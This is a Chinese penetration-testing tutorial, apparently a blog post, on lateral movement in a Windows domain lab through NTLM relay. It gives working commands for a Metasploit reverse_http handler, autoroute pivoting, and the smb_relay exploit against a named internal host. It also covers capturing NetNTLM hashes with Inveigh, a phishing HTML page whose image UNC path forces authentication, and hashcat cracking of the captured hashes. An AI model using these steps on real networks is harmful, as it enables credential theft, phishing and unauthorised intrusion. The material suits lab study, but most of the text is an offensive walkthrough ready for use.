内网渗透之横向移动NTMLRelay(中继)攻击-Inveigh&NTLM-Relay重放

横向移动 NTLM中继攻击 Relay重放(smb)

适用于无法获取hash或密码时使用
NTML Relay重放包括smb to relay ldap ews
webserver:
执行下面的命令时会默认以当前用户名和密码去登录目标计算机

dir \\ 192.168.3.32\c$

在这里插入图片描述
webserver切换到本地的administrator时

dir \\ 192.168.3.32\c$

在这里插入图片描述
出现这种现象的原因是webserver和sqlserver的本地管理员的密码是一样的,所以能登录成功,weadmin在sqlserver是没有登录的,当前没有这个用户所以匹配肯定失败,默认以当前用户尝试登录的

环境:
god.org
条件:双方用户名密码一致
1.cs转发至msf
cs:

spawn liandong   #监听器的名字

msf
监听上线:

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 0.0.0.0
set lport 8000
run

在这里插入图片描述
2.添加路由:

run post/multi/manage/autoroute 

3.进行smb重放攻击
注意如果要使用administrator尝试登录的话,如果当前权限是system,可以使用msf或cs进行降权,ps migrate pid(adminstrator运行的id)

use exploit/windows/smb/smb_relay
set smbhost 192.168.3.32                                         #要攻击的地址
set lhost 192.168.85.129 
set autorunscript post/windows/manage/migrate
set payload windows/meterpreter/bind_tcp                       #64位没成功
set rhost 192.168.3.32                                         
run

webserver操作,注意这里要用aminsitrator用户

 dir \\192.168.85.129\c$`

成功上线
在这里插入图片描述
kali相当于中间人,利用webserver发送的账号密码去连接sqlserver

横向移动 NTLM中继攻击 Inveigh嗅探 Hash破解

条件:被控主机当前管理员权限
Responder中继攻击-NTLM Hash破解
1、监听拦截
放在websever上
Inveigh.exe
获取到的是NET NTLM HASH V1或V2
此hash是挑战hash,是不能直接用来hash传递攻击的
在这里插入图片描述
在但前文件会生成hash的一个txt文件
在这里插入图片描述
2、触发拦截
需要有请求的动作,不需要非得访问webserver,只要有用户名和密码验证就能抓到

dir \\192.168.3.32\c$

钓鱼触发
发邮件给内网其他主机
http://192.168.3.31/1.html
1.html

<!DOCTYPE html>
<html>
<head>
  <title></title>
</head>
<body>
  <img src="file:///\\192.168.3.32\2">
</body>
</html>

3、kali的hashcat 破解密文

hashcat -m 5600 hash1 pass2.txt 
hashcat -m 5600 hash1 pass2.txt  --show

在这里插入图片描述
hashcat可能会报错,包处理器内存不够
需要修改为单核单处理器,并把内存调到4g,注意关机操作
在这里插入图片描述

hashcat报错

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值